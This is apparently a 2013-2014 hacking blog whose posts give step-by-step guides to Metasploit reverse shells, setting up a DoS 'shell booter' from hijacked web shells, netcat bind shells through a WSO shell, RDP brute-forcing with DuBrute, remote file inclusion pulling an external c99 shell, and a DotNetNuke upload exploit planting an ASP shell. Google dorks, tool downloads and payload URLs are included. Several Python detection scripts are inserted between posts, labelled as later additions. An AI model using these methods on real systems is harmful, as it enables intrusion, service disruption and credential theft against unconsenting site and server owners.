Thursday, February 27, 2014

Back Connecting With Metasploit

Salam Friends

NOTE: This tutorial is for educational purposes only.

Today I will show you how to back connect with Metasploit. I found it better than back connecting with netcat, because some servers do not connect with netcat but do connect with Metasploit.

I have already forwarded a port for my BackTrack machine; it is 3333 in my case. My local IP is 192.168.1.3.

NOTE: If you are on a VPN, switch it off.

Run Metasploit and give the following commands:
>use exploit/multi/handler
>set lhost 192.168.1.3
>set lport 3333

Now it is time to select the payload. Here you have to check your server's operating system. For example, I have Linux x86_64, so I will set this payload:

>set payload linux/x64/shell/reverse_tcp

>exploit

The payload handler will be started in your Metasploit.

Now go to your server side and click connect back with the port (3333) and your global IP.

After clicking connect you will get a reverse shell in Metasploit.

 Regards
Gujjar(pcp)

Sunday, February 23, 2014

Making Shell Booter + source

NOTE: This tutorial is for educational purposes only.
Shell Booter source + How To Make Your Own
Salam to all
Today I am going to show you guys how to make your own shell booter.
Let me explain a little about what a shell booter is. A shell booter uses a series of shells to send packets to someone's router; the router can't handle that many packets and no longer allows access to websites for a while.

NOTE: The more shells you add, the stronger the booter becomes.
Requirements...

Prodigy Source + Mass Shell Adder
http://www.mediafire.com/download/2g5atps0t9pks7f/Prodigy%27s+Source+Mass+Shell+Adder+by+Natha.zip
Shell Checker
http://www.mediafire.com/download/du52p5rlfdm5ura/ShellChecker.exe (this is optional, for searching and adding shells to your booter; you can do it manually or by any other method you like)

How To Setup A ShellBooter
Now come to the real work. For setting up a booter we should have a cPanel with MySQL and phpMyAdmin.
[Image: MD1.jpg]


Creating a MySQL Database

I am now going to walk you through how to make a MySQL database. This is required for the booter to function, as it saves the users, passwords, shells, and so on. In the following demonstration I will be using cPanel.
Click on "Mysql Management" as shown in the pic...
[Image: MD2.jpg]
Click on "create a new database",
then create a database with your own login details. Remember, we will need these login details afterwards.
[Image: MD3.jpg]
I created my database with the name MADLEET.
Once your database is there, you have to set all permissions, like in the pic.
[Image: MD4.jpg]
Make sure that you have set all permissions or privileges to "yes", like in the pic.
[Image: MD5.jpg]

Setting Up PhpMyAdmin
Now it is time to import your SQL settings into "PhpMyAdmin".
Click on "PhpMyAdmin" in your cPanel, then click on the database which you have created and select the SQL tab.
[Image: MD6.jpg]
Now open the source file which I have provided in the link.
Upload all source files to your cPanel, select dbc.php and edit its login details with your database login details, like in the pic.
http://postimg.org/image/ct3n5rbl5/
Extract the source file and you will find a file named "dbprepare.sql". Open this file in Notepad, copy its source, then paste this text into the PhpMyAdmin SQL box of your database.
[Image: md7.jpg]
Now scroll down a little and enter the name of your database, as in the pic.
[Image: MD8.jpg]

Now, we're up to the last part of setting up the booter. Go to http://yoursite.com/source/register.php (obviously replace yoursite with your own domain) and register yourself a new account. Once completed, go back to PhpMyAdmin, go to the users table
and set user level 5 and approved 1. This will make you administrator.
[Image: MD9.jpg]

Complete! Now log in to your booter at http://yoursite.com/source/. You've successfully set up your booter!
The login page for your booter will look like this:
[Image: 121.jpg]
After login, your booter's control panel will look like this:
[Image: 1212.jpg]
Getting Free Shells From Pastebin

Open ShellChecker.exe, the link I have provided above, that you downloaded before, and go to pastebin.com, or pastie.org. Or other pastebin sites that allow search.

In the search box type one of these in, open them until you get a big list.

Code:

/x32.php
/greenshell.php
/shell.php
/webdav/

Once you've found a list, go to the bottom, copy it all from the little box, and paste it into the first column of your shell checker.
[Image: MD10.jpg]
It will give you UDP and TCP shells.
TCP are POST and UDP are GET shells.

Regards
GUJJAR(PCP) 

Saturday, February 22, 2014

Back Connecting Without Port Forward

Note: This tutorial is for educational purposes only.
Salam to all
Gujjar(pcp) is here, guys.
Today I am going to share a method with you guys, which is about backconnecting.
I saw many friends wondering how to port forward in their routers for backconnecting & rooting, coz weevely suc**. :|
So I made this tutorial for those friends; hope you will like it.
There is no need to port forward in your router for backconnecting; you can simply use an alternate way.
Things you need:
1. Shell site (a simple WSO shell on a site)
2. Netcat on your system
3. You should be on your original IP, not any VPN (condition)

Let's start.
Open your WSO shell and click on Network or Connect, like in the pic.
[Image: ttt.jpg]

Now here you can see 2 options: the first is Bind port to /bin/sh, the second is Back-connect.
We will use the 1st option,
Bind port to /bin/sh.
In the previous pic you can see port 31337 is selected by default. Now click go or press enter, like in the pic.

[Image: tttttttttrtrtrtrtrtrtr.jpg]

Now the port is bound on the target server. Move to the next step.
Open your cmd window, change to the netcat path and give this command, like in the pic.

[Image: yutyutyut.jpg]

c:\netcat>nc [server's Ip here] port
like ...
c:\netcat>nc 76.86.3.242 31337

Now press enter & voila :v
You are done.
Regards
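
On the server side, a port bound to /bin/sh as described above shows up as a listening socket owned by a shell rather than by a known service. The following Python example is added here for defenders and is not part of the original post: it audits `ss -ltnp` style output against a baseline; the baseline table, the sample output and the process names in it are constructed assumptions.

```python
import re

# Assumed baseline of listeners this host is supposed to expose (hypothetical).
EXPECTED = {22: {"sshd"}, 80: {"apache2"}, 443: {"apache2"}, 3306: {"mysqld"}}
# Programs that should never own a listening socket on a web server.
SHELLS = {"sh", "bash", "dash", "ksh", "zsh", "nc", "ncat", "netcat"}
PROC = re.compile(r'\("([^"]+)",pid=(\d+)')

# Constructed sample in the format printed by `ss -ltnp`, not real output.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*   users:(("sshd",pid=812,fd=3))
LISTEN 0      511          0.0.0.0:80         0.0.0.0:*   users:(("apache2",pid=1040,fd=4),("apache2",pid=1041,fd=4))
LISTEN 0      80         127.0.0.1:3306       0.0.0.0:*   users:(("mysqld",pid=950,fd=21))
LISTEN 0      1            0.0.0.0:31337      0.0.0.0:*   users:(("sh",pid=4242,fd=3))
LISTEN 0      511             [::]:6379          [::]:*   users:(("redis-server",pid=1500,fd=6))
"""

def audit_listeners(ss_output, expected=EXPECTED):
    """Return (port, process, pid, reason) for listeners that break the baseline."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue  # header or non-listening socket
        port = int(fields[3].rsplit(":", 1)[1])
        # ss may omit the users:(...) column without privileges; report "unknown".
        owners = sorted(set(PROC.findall(line))) or [("unknown", "0")]
        for name, pid in owners:
            if name in SHELLS:
                reason = "shell owns a listening socket"
            elif name not in expected.get(port, set()):
                reason = "listener not in baseline"
            else:
                continue
            findings.append((port, name, int(pid), reason))
    return findings

if __name__ == "__main__":
    for finding in audit_listeners(SAMPLE_SS):
        print(finding)
```

A host firewall that only admits inbound connections to the baseline ports makes such a listener unreachable even when it can be started.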

Thursday, February 20, 2014

Port Forwarding (PTCL Routers Specially)

Salam to all
In this tutorial I will show you how to forward your port, for gaming & other purposes :D
1 : First go to your router's settings at 192.168.1.1 and log in.

2 : Then go to Advance setup, then go to NAT & select PVC7.

3 : After selecting PVC7 go to the Virtual Server option.

4 : Then select your desired port with your operating system's local IP. Put the same port as start & end port.
NOTE: In some routers there is an option for UDP & TCP ports; in this case save the same port with UDP & TCP
separately, & save your settings.

5 : You are done :D
    You can use your port now, but let me test whether it is open or not :D
NOTE: This testing is not necessary.
For testing I have already opened my port for VMware, with BackTrack 5 R3 running in it, so I am going to test with METASPLOIT :D
6 : Run Metasploit in BackTrack & give the following commands
>use exploit/multi/handler
>set payload windows/meterpreter/reverse_tcp
>set lport 3333
>set lhost 192.168.1.3
>exploit
NOTE: LPORT is 3333 & LHOST is 192.168.1.3 in my case; put your details as you have them.

7 : Now go to yougetsignal.com & test your port with your global IP.

8 : You can see the port is open, & after testing the port opening your Metasploit will show like that


Regards
GUJJAR(PCP)

Install Kali Linux In VmWare

  1. Download Kali Linux ISO
  2. https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/10_0 ( I am using VMware Workstation in this tutorial; if you have VirtualBox or VMware Player that is fine, as the installation process is pretty much the same on every virtual platform )
Installation Process
1 : Click on create new virtual machine
2 : Choose ISO
3 : Select Guest Operating System
4 : Set name and location
5 : Set disk space ( 20 GB is good enough, minimum 12 GB to work smoother )
5 : Review the hardware configuration and start the virtual machine
6 : Select Graphical Install, go through the normal language, timezone and host-name selection etc.
Set your “root” password and don’t forget it
7 : Disk Partition ( if you are installing freshly without any dual boot then simply use guided and use the full virtual disk )
8 : Select the hard drive and select all-in-one ( for new users ), or if you don’t know just choose all in one
9 : Click on finish partitioning and write changes to disk, choose yes to write
10 : Wait until the installer finishes copying files and setting up the system
11 : Set the network mirror and set the boot-loader ( very important )
12 : After installation restart and log in with username ” root ” and the password ( what you set at step 6 )

Friday, November 22, 2013

RDP a.k.a VPS Cracking

NOTE: This tutorial is for educational purposes only.
Salam to all
Let's start how to crack RDP aka VPS.
All you need is 2 pieces of software called DuBrute and Vnc_scanner to hack VPS.
You can download these tools from the given links or by searching on Google easily.
for VNC_Scanner http://www.mediafire.com/?dka5g2wurcjaugv
& for Dubrute http://www.mediafire.com/?l5l416b99bd748c

1) Download both the files from the above link.

2) Extract both the files anywhere on your PC.

3) Open Vnc_scanner folder

4) Open the exe file called vnc_scanner_gui.exe

NOTE: Here is a point which is never explained on any forum I have ever seen. The point is that this VNC scanner never gives you the dialup list or country IP list.
I saw users always asking about this problem, so I will explain its solution here.
First of all:
5) Select any Country.

6) Click on Get Dial List
If you get the country IP list then you are lucky enough; otherwise, as I said, this feature will not work, and you can get any country's IPs by
going to this site and searching the IP range for any country.

http://www.proxysecurity.com/ip-address-...y=RESERVED

see image http://postimage.org/image/6gw62kc57/

After getting the IP list, paste it in Notepad. Here you have to edit this list a bit: the " - " between IPs has extra spaces and the VNC scanner will not accept this list, so replace " - " with a simple "-", as explained in the image.

see image http://postimage.org/image/vlch3uvy7/

http://postimage.org/image/m64jueplz/

Now paste that into the VNC scanner's -i box & start the scan as shown in the snap
http://postimage.org/image/wclsahvov/

After that it will scan for working VPS IPs, as in the figure
http://postimage.org/image/kl73r6fu7/

After the scan has finished click on Start parser (this is an option in vnc_scanner, as you can see in the VNC scanner's pic). It will save good IPs in a new text file called IPs.txt in the same folder where vnc_scanner is placed.

Now you need to get the usernames and passwords for the scanned IPs. For that you have to use the hacking software called Dubrute.



1) Open Dubrute folder

2) Copy the IPs.txt file from vnc_scanner folder and paste in Dubrute folder

3) Open the DUBrute.exe as shown in snap...
http://postimage.org/image/hwf0m94h5/

4) Click on Generation as shown in snap...
http://postimage.org/image/nw541x1gv/

1st, click on File IP then select the text file called IPs.txt which you already have in your vnc_scanner folder.

2nd, you need to put in a txt file for user names.
Put some user names like
admin
root
user
etc
in Notepad & save it, then select this txt file.

3rd, you need a password txt file also. You can put some common passwords in Notepad & save it as a password list, then select this password list as in the figure's 3rd option.

Now press Start in your Dubrute.



Let it brute the combinations. When a working VPS is found whose IP, username and password match, it will be saved in the Dubrute folder in a file called good.txt
http://postimage.org/image/m76gevah3/
This image shows that I found 3 VPS which are working.
After getting a working VPS, open "Remote Desktop Connection" on your PC & enter the IP; it will then ask for user & pass. Enter the login details and you will be redirected to the remote PC.

That's all. 1 more thing: maybe your AV will detect these 2 cracking files as a virus, so ignore it.

If you get any problem then feel free to contact me here in madleets or on FB https://www.facebook.com/mindfreakzzz

regards
gujjar haxor (pcp)
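
The username and password list guessing described above produces a burst of failed logons from one source against several account names. The following Python example is added here for defenders and is not part of the original post: it applies a sliding-window threshold to failed-logon records; the records, addresses and thresholds are constructed assumptions, shaped like fields exported from Windows Security event ID 4625.

```python
from collections import defaultdict
from datetime import datetime, timedelta

BASE = datetime(2013, 11, 22, 3, 0, 0)

def _at(seconds):
    return BASE + timedelta(seconds=seconds)

# Constructed failed-logon records: (timestamp, source IP, target username).
SAMPLE_FAILURES = (
    # One source cycling through common account names every 10 seconds.
    [(_at(10 * i), "198.51.100.23", ("admin", "root", "user")[i % 3]) for i in range(9)]
    # A user mistyping a password twice.
    + [(_at(0), "192.0.2.10", "alice"), (_at(60), "192.0.2.10", "alice")]
    # Occasional failures spread over 20 minutes.
    + [(_at(600 * i), "203.0.113.50", "bob") for i in range(3)]
)

def detect_password_guessing(events, window=timedelta(minutes=5),
                             max_failures=5, max_users=3):
    """Flag sources whose failures or distinct usernames in any window hit a threshold."""
    by_ip = defaultdict(list)
    for ts, ip, user in events:
        by_ip[ip].append((ts, user.lower()))
    flagged = {}
    for ip, rows in by_ip.items():
        rows.sort()
        start = peak_fail = peak_users = 0
        for end, (ts, _) in enumerate(rows):
            # Slide the left edge so the window never spans more than `window`.
            while ts - rows[start][0] > window:
                start += 1
            in_window = rows[start:end + 1]
            peak_fail = max(peak_fail, len(in_window))
            peak_users = max(peak_users, len({u for _, u in in_window}))
        if peak_fail >= max_failures or peak_users >= max_users:
            flagged[ip] = {"failures": peak_fail, "usernames": peak_users}
    return flagged

if __name__ == "__main__":
    print(detect_password_guessing(SAMPLE_FAILURES))
```

Detection works best alongside account lockout, Network Level Authentication and keeping RDP (TCP 3389) off the open internet behind a VPN or gateway.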

Wednesday, November 20, 2013

RFI (Remote File Inclusion) Website Hacking Tutorial

NOTE: This tutorial is for educational purposes only, to get the concept of the RFI attack.


Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few, it can lead to:
- Code execution on the web server
- Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross site scripting (XSS)
- Denial of Service (DoS)
- Data Theft/Manipulation
www.targetsite.com/index.php?page=www.google.com

http://www.target.com/v2/index.php?page=http://www.google.com

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

Now here is how a hacker would execute the shells to gain access. Let's say that the URL of the shell is http://www.sh3ll.org/c99.txt?
http://www.target.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?

Regards

Lets Start 
1st Step : Find vulnerable websites using a Google dork


“inurl:index.php?page=” is the most popular dork for RFI hacking

This will show all the pages which have “index.php?page=” in their URL. Now, to test whether the website is vulnerable to Remote File Inclusion or not, the hacker uses the following command

see example of this website  http://www.cbspk.com

So the hacker url will become

If after executing the command the Google homepage shows up, then the website is vulnerable to this attack; if it does not come up, then you should look for a new target. In my case, after executing the above command in the address bar, the Google homepage shows up, indicating that the website is vulnerable to this attack.


The hacker would first upload the shells to a webhosting site such as ripway.com, viralhosts.com, 110mb.com or another free host etc.

Now here is how a hacker would execute the following command to gain access

Don't forget to add “?” after .txt at the end of the URL, or else the shell will not execute. Now the hacker is inside the website and he could do anything with it
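
The probe described above leaves a recognisable trace in the web server's access log: a query parameter whose value is itself a remote URL. The following Python example is added here for defenders and is not part of the original post: it scans combined-format log lines for such requests, including URL-encoded ones; the log lines and the example.invalid host are constructed. On the server, the durable fix is to map the page parameter to an allow-list of local files and keep PHP's allow_url_include off.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Schemes a PHP include() can fetch when remote includes are enabled.
REMOTE_SCHEME = re.compile(r"^(?:https?|ftps?)://", re.IGNORECASE)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample access-log lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Nov/2013:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '203.0.113.9 - - [20/Nov/2013:10:02:10 +0000] "GET /v2/index.php?page=http://www.google.com HTTP/1.1" 200 48211',
    '203.0.113.9 - - [20/Nov/2013:10:03:44 +0000] "GET /v2/index.php?page=http%3A%2F%2Fexample.invalid%2Fc99.txt%3F HTTP/1.1" 200 90133',
    '198.51.100.4 - - [20/Nov/2013:10:05:00 +0000] "GET /search.php?q=http+tutorial HTTP/1.1" 200 2210',
]

def find_rfi_attempts(lines):
    """Return (client_ip, parameter, value, status) for remote-URL parameters."""
    hits = []
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue  # not a request line we understand
        ip, target, status = match.groups()
        query = urlsplit(target).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double encoding.
            decoded = unquote(value).strip()
            if REMOTE_SCHEME.match(decoded):
                hits.append((ip, name, decoded, int(status)))
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 and an unusually large response size deserves the closest look, since it suggests the remote content was actually fetched and rendered.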

Portal Hacking (DNN) | Dot Net Nuke Website Hacking Tutorial

NOTE: This tutorial is for educational purposes only, to understand DNN attacks.
Salam friends. Another easy method of website hacking is called "Portal Hacking (Dot Net Nuke)".
Lets start
Step 1: Open Google.com
Step 2: Now enter any of these dorks
inurl:/tabid/36/language/en-US/Default.aspx
inurl:fcklinkgallery.aspx
These dorks will automatically find vulnerable sites.
Step 3:
You will find many sites. Select any one.

Step 4: 
For example take this site.
Example:


Step 5: Now replace

/Home/tabid/36/Language/en-US/Default.aspx

with this

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 6: You will get a Link Gallery page. So far so good!

Step 7: Don't do anything for now, wait for the next step...

Step 8:
Now replace the URL in the address bar with a simple script

javascript:__doPostBack('ctlURL$cmdUpload','')
Step 9: You will find the Upload option

Step 10:
Select Root
Step 11:
Upload your ASP shell. Download it here

After upload,
go to your shell at www.yoursite.com/portals/0/yourshellname.asp;.jpg

Regards
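
The file name in the last step, yourshellname.asp;.jpg, passes any check that looks only at the final extension, while older IIS versions stop reading the name at the semicolon and treat it as ASP. The following Python example is added here for defenders and is not part of the original post or of DNN: it validates client-supplied upload names; the allow-list, the extension sets and the sample names are assumptions for illustration.

```python
import re

# Assumed upload policy for this example (hypothetical; adjust per application).
ALLOWED = {"jpg", "jpeg", "png", "gif", "pdf"}
# Extensions a Windows/IIS server may hand to a script engine.
EXECUTABLE = {"asp", "aspx", "asa", "asax", "ashx", "asmx", "cer", "cdx", "config", "php"}
# ';' and ':' change how IIS and NTFS interpret a name; separators and
# control characters never belong in a stored file name.
FORBIDDEN = re.compile(r'[;:<>"|?*\x00-\x1f/\\]')

def check_upload_name(filename):
    """Return (accepted, reason) for a client-supplied upload file name."""
    if FORBIDDEN.search(filename):
        return False, "forbidden character"
    if filename != filename.strip(" ."):
        return False, "leading or trailing dot/space"
    stem, *extensions = filename.lower().split(".")
    if not stem or not extensions:
        return False, "missing name or extension"
    if extensions[-1] not in ALLOWED:
        return False, "extension not on allow-list"
    # Reject script extensions hidden in front of an allowed one.
    if any(ext in EXECUTABLE for ext in extensions[:-1]):
        return False, "executable extension inside name"
    return True, "ok"

# Constructed sample names; the first is the pattern from the tutorial above.
SAMPLES = ["yourshellname.asp;.jpg", "shell.asp.jpg", "report.aspx",
           "photo.JPG", "../portals/0/x.jpg", "holiday.2014.png"]

def classify(names=SAMPLES):
    """Map each sample name to its (accepted, reason) verdict."""
    return {name: check_upload_name(name) for name in names}

if __name__ == "__main__":
    for name, verdict in classify().items():
        print(name, verdict)
```

Name checks are one layer only: store uploads under a server-generated name, disable script execution in the upload directory, and keep the CMS and its editor provider patched.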